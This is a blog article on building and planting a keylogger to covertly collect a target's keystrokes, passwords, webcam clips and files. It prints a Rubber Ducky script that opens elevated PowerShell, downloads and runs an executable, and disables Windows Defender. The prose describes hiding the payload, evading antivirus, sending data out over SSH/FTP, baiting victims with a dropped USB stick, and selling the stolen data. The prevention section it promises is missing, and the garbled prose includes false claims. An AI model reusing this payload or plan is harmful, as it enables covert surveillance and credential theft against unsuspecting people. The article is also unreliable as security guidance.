Programming a Keylogger in Python

Written by morpheuslord | Published 2021/06/10
Tech Story Tags: ethical-hacking | hacking | keylogger | cybersecurity | identity-management | identity-verification | cyber-threats | data-breach | web-monetization

TLDR A keylogger is a tool designed to record every keystroke on a system for later retrieval. Python keyloggers use python to be preinstalled in the victim's system and to have python installed or you may convert it into a binary to be installed in the system any way. The most basic program can collect the info only typed by the target and collect it via email or application. More sophisticated programs can collect:Typed Information, GPS location, IP address, saved data and saved data. You can even stealth your operation by adding the hiding the programs in a location and hiding the folder using the hide function.via the TL;DR App
A keylogger is a tool designed to record every keystroke on a system for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed by the target or typed in the affected computer such as users' passwords and other private information. Often hackers use viruses trojans and rootkits-like methods to remain active and hidden
The amount of info a keylogger can collect by keylogger software can vary by the software used and how complex it is. The most basic program can collect the info only typed by the target and collect it via email or application. More sophisticated keylogger software can collect:
  • Typed Information
  • GPS location
  • IP location
  • Saved data
  • FTP and SSH transfer service
  • Download and upload data
In this article, we'll discuss:
  • Program a keylogger in Python
  • Injecting the script
  • Setting up autorun feature
  • Select retrieving information method
  • Tools and things required to execute the attack
  • Risk
  • Preventions
  • Courses on Udemy

Program a keylogger in Python

You may need Python and C++ even some Arduino and ducky coding engines to run and execute the codes for the keyloggers.
Python keylogger uses python to be preinstalled in the victim's system and to have python installed or you may convert it into a binary to be installed in the system any way I am going to explain the dynamics but not how to code the entire thing as even I don't know how to do it don't judge me. well, I am going to suggest a few Udemy courses for that you can check them out if you want to learn how to build a keylogger.

Injecting the script

If you have written and converted the script to a binary file and uploaded it to a Mediafire, you can download it via a code running in the background using a ducky script. Now, you can have the code and script in one single ducky script that it runs in the background of the system like if code it in such a way that the code uses the os function to do the background using of the tool.
Using this you can even stealth your operation by adding the hiding the programs in a location and hiding the folder using the hide function or header
Script download and execute the file from a website and disable defender using Powershell:
REM Windows 10: Poweshell administrator download and execute file
REM Author: Judge2020
REM author website: Judge2020.com
REM
REM start of script
REM
REM let the HID enumerate
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y
DELAY 200
STRING $down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file);
DELAY 1000
GUI r
DELAY 200
REM my best attempt at a elevated powershell instance
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1000
ALT y 
DELAY 200
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
STRING exit
ENTER
exit;
The above image shows the complete map of how does the hid attack work in detail.

Setting up autorun feature

Using this code you can add an autorun feature for a file. There are softwares outside that automates the process but for the best result, you can opt for injecting the codes inside another program that you know the target often uses. This can be achieved by adding a new icon on the desktop replacing the already existing icon with it or you can install the autorun feature in the source code. You can even stealth the files by converting the files to binaries and changing the name to another name from the source code only. This way, you can hide this from the task manager and other uses and if you are smart enough you can code it in such a way that the antivirus software does not recognize it as a virus but as a legit application.

Setting up the information retrieval mechanism

You can select the retrieval method and the way you want to extract the data from the target one of the few options is using ssh and FTP and I think ssh is the best because the name only suggests secured Shell. Its recommended to keep yourself safe to a certain extent from reverse engineering of the application but you can also use FTP to just transfer the files and folders to the Raspberry Pi set-up. To listen and capture the incoming data, this type of keylogger is really dangerous as your data can be transferred in just 1 or 2 hours if the attacker has good internet
You can imagine it as like this:
( target view )
  1. I have found a Pendrive fallen
  2. Connected to a pc
  3. The pc restarts
  4. I have found an app on the Pendrive and I run it
  5. Nothing happens
  6. I remove the Pendrive
( hackers view )
  1. I receive a connection
  2. I download the files I intended to
  3. install all the malicious files into the targets computer
  4. sell the files and info on the dark web
Data retrieved I can retrieve:
  • login information
  • web data
  • stored passwords
  • wifi passwords
  • system logs
  • web camera clips
  • photos
  • videos
  • download's list
  • documents
  • and many more.......

Tools and things required to execute the attack

  1. rubber ducky:- a rubber ducky is a hak5 tool that automates keystroke's when the rubber ducky is connected to a system it portrays itself as a keyboard and starts to inject commands in the victim's system with a superhuman speed in the background and the victim will not even notice it will be over in a second and the hacker will receive a reverse connection.
  2. internet:-If you never connect your computer, you are 100 percent safe from hackers on the internet. There is no way someone can hack and retrieve, alter or monitor information without physical access. This however is not the only way unconnected computers or smartphones can be accessed or monitored.
  3. Raspberry pi 4:-The Raspberry Pi 4 can do a surprising amount. Amateur tech enthusiasts use Pi boards as media centers, file servers, retro games consoles, routers, and network-level ad-blockers, for starters.
  4. python and c++ scripting engine:-u can use any scripting engine from notepad to visual studios for the job.
  5. ducky and Arduino scripting engine: you can do ducky scripts in any scripting engine but Arduino uses Arduino engine to write Arduino scripts.
Rubberducky definitions directly copied from Hak5
Hacking is a risky job and you may end up behind bars for doing things such as hacking IT services and other things please do it responsibly by taking permission from the target before doing such a thing.

Sources

Follow me

Follow my Twitter account for the latest updates
Written by morpheuslord | I am a red team operator, and a security enthusiast I write blogs and articles related to cyber-sec topics.
Published by HackerNoon on 2021/06/10
ABOUTHow hackers start their afternoons. We publish tech stories and build publishing software.

READEntirely free library read by hundreds of millions to learn anything about any technology.

WRITEHackerNoon elevates quality technology writing far and wide across the interwebs.

PARTNERHackerNoon works directly with tech companies to place ads by content relevancy